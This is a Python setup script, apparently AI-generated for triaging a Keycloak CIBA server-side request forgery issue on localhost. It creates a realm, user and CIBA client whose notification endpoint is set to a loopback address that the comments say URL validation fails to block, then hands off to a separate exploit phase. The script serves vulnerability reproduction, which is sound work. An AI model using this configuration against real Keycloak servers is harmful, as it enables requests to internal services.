#!/usr/bin/env python3
"""
Bob-Sentry Triage Script — Script A (Setup)
Issue: #49915
CVE Pattern: CVE-2026-1518 (matches CVE-2026-4874 SSRF pattern)
Generated by: Bob Code Mode
WARNING: This script targets http://localhost:8080 only.
         Do NOT execute against any remote or production instance.
"""
import sys
import json
import time
import requests

# ── Configuration ─────────────────────────────────────────────────────────────
BASE_URL      = "http://localhost:8080"
REALM         = "triage-realm"
CLIENT_ID     = "triage-ciba-client"
CLIENT_SECRET = "triage-secret"
ADMIN_USER    = "admin"
ADMIN_PASS    = "admin"
TEST_USER     = "triage-user"
TEST_PASS     = "triage-pass"
# ──────────────────────────────────────────────────────────────────────────────

def step(msg):
    print(f"[SETUP] {msg}", flush=True)

def fail(msg, code=2):
    print(f"[ERROR] {msg}", flush=True)
    print(f'RESULT: {json.dumps({"phase": "setup", "status": "failed", "reason": msg})}', flush=True)
    sys.exit(code)

# ── A1: Admin token ───────────────────────────────────────────────────────────
step("Obtaining admin token...")
try:
    resp = requests.post(
        f"{BASE_URL}/realms/master/protocol/openid-connect/token",
        data={
            "grant_type": "password",
            "client_id": "admin-cli",
            "username": ADMIN_USER,
            "password": ADMIN_PASS,
        },
        timeout=10,
    )
    resp.raise_for_status()
    admin_token = resp.json()["access_token"]
    headers = {"Authorization": f"Bearer {admin_token}", "Content-Type": "application/json"}
    step("Obtained admin token... OK")
except Exception as e:
    fail(f"Could not obtain admin token: {e}")

# ── A2: Create realm ──────────────────────────────────────────────────────────
step(f"Creating realm '{REALM}'...")
resp = requests.post(
    f"{BASE_URL}/admin/realms",
    headers=headers,
    json={
        "realm": REALM,
        "enabled": True,
        "displayName": "Bob-Sentry CIBA SSRF Triage Realm",
        "sslRequired": "none",
    },
    timeout=10,
)
if resp.status_code == 409:
    step(f"Realm '{REALM}' already exists, continuing...")
elif resp.status_code not in (201, 204):
    fail(f"Failed to create realm: {resp.status_code} {resp.text}")
else:
    step(f"Created realm '{REALM}'... OK")

# ── Enable CIBA on realm ──────────────────────────────────────────────────────
step("Enabling CIBA on realm...")
resp = requests.put(
    f"{BASE_URL}/admin/realms/{REALM}",
    headers=headers,
    json={
        "attributes": {
            "cibaBackchannelTokenDeliveryMode": "ping",
            "cibaExpiresIn": "120",
            "cibaInterval": "5",
            "cibaAuthRequestedUserHint": "login_hint",
            # The HTTP authentication channel URL — Keycloak POSTs here to dispatch
            # the push request to the user's device. We point it at our mock server.
            "cibaAuthChannelUrl": "http://127.0.0.1:9999/channel",
        }
    },
    timeout=10,
)
if resp.status_code not in (200, 204):
    fail(f"Failed to enable CIBA on realm: {resp.status_code} {resp.text}")
step("CIBA enabled on realm... OK")

# ── A3: Create CIBA client ────────────────────────────────────────────────────
step(f"Creating CIBA client '{CLIENT_ID}'...")
resp = requests.post(
    f"{BASE_URL}/admin/realms/{REALM}/clients",
    headers=headers,
    json={
        "clientId": CLIENT_ID,
        "enabled": True,
        "protocol": "openid-connect",
        "publicClient": False,
        "secret": CLIENT_SECRET,
        "standardFlowEnabled": True,
        "directAccessGrantsEnabled": True,
        "redirectUris": ["http://localhost:9999/*"],
        "attributes": {
            # Enable CIBA grant on this client (from CibaConfig.OIDC_CIBA_GRANT_ENABLED)
            "oidc.ciba.grant.enabled": "true",
            # CIBA delivery mode per-client (from CibaConfig.CIBA_BACKCHANNEL_TOKEN_DELIVERY_MODE_PER_CLIENT)
            "ciba.backchannel.token.delivery.mode": "ping",
            # The SSRF target — loopback address. checkUrl() in UriUtils.java does NOT block this.
            # (from CibaConfig.CIBA_BACKCHANNEL_CLIENT_NOTIFICATION_ENDPOINT)
            "ciba.backchannel.client.notification.endpoint": "http://127.0.0.1:9999/notify",
        },
    },
    timeout=10,
)
if resp.status_code == 409:
    step(f"Client '{CLIENT_ID}' already exists, continuing...")
elif resp.status_code not in (201, 204):
    fail(f"Failed to create CIBA client: {resp.status_code} {resp.text}")
else:
    step(f"Created CIBA client '{CLIENT_ID}'... OK")

# ── A4: Get client UUID ───────────────────────────────────────────────────────
step("Retrieving client UUID...")
resp = requests.get(
    f"{BASE_URL}/admin/realms/{REALM}/clients?clientId={CLIENT_ID}",
    headers=headers,
    timeout=10,
)
resp.raise_for_status()
clients = resp.json()
if not clients:
    fail(f"Client '{CLIENT_ID}' not found after creation")
client_uuid = clients[0]["id"]
step(f"Client UUID: {client_uuid}... OK")

# ── A5: Create test user ──────────────────────────────────────────────────────
step(f"Creating test user '{TEST_USER}'...")
resp = requests.post(
    f"{BASE_URL}/admin/realms/{REALM}/users",
    headers=headers,
    json={
        "username": TEST_USER,
        "enabled": True,
        "email": "triage-user@localhost.test",
        "firstName": "Triage",
        "lastName": "User",
        "credentials": [{"type": "password", "value": TEST_PASS, "temporary": False}],
    },
    timeout=10,
)
if resp.status_code == 409:
    step(f"User '{TEST_USER}' already exists, continuing...")
elif resp.status_code not in (201, 204):
    fail(f"Failed to create user: {resp.status_code} {resp.text}")
else:
    step(f"Created user '{TEST_USER}'... OK")

# ── Verify CIBA configuration is saved ───────────────────────────────────────
step("Verifying CIBA client configuration was saved...")
resp = requests.get(
    f"{BASE_URL}/admin/realms/{REALM}/clients/{client_uuid}",
    headers=headers,
    timeout=10,
)
resp.raise_for_status()
client_data = resp.json()
notification_endpoint = client_data.get("attributes", {}).get(
    "ciba.backchannel.client.notification.endpoint", "NOT SET"
)
step(f"backchannel_client_notification_endpoint = '{notification_endpoint}'")

if notification_endpoint == "NOT SET":
    fail("CIBA notification endpoint attribute was not saved — client may not support CIBA ping mode")

step("Environment ready. Proceeding to exploit phase.")
print(
    f'RESULT: {json.dumps({"phase": "setup", "status": "ready", "realm": REALM, "client": CLIENT_ID, "notification_endpoint": notification_endpoint})}',
    flush=True,
)
sys.exit(0)
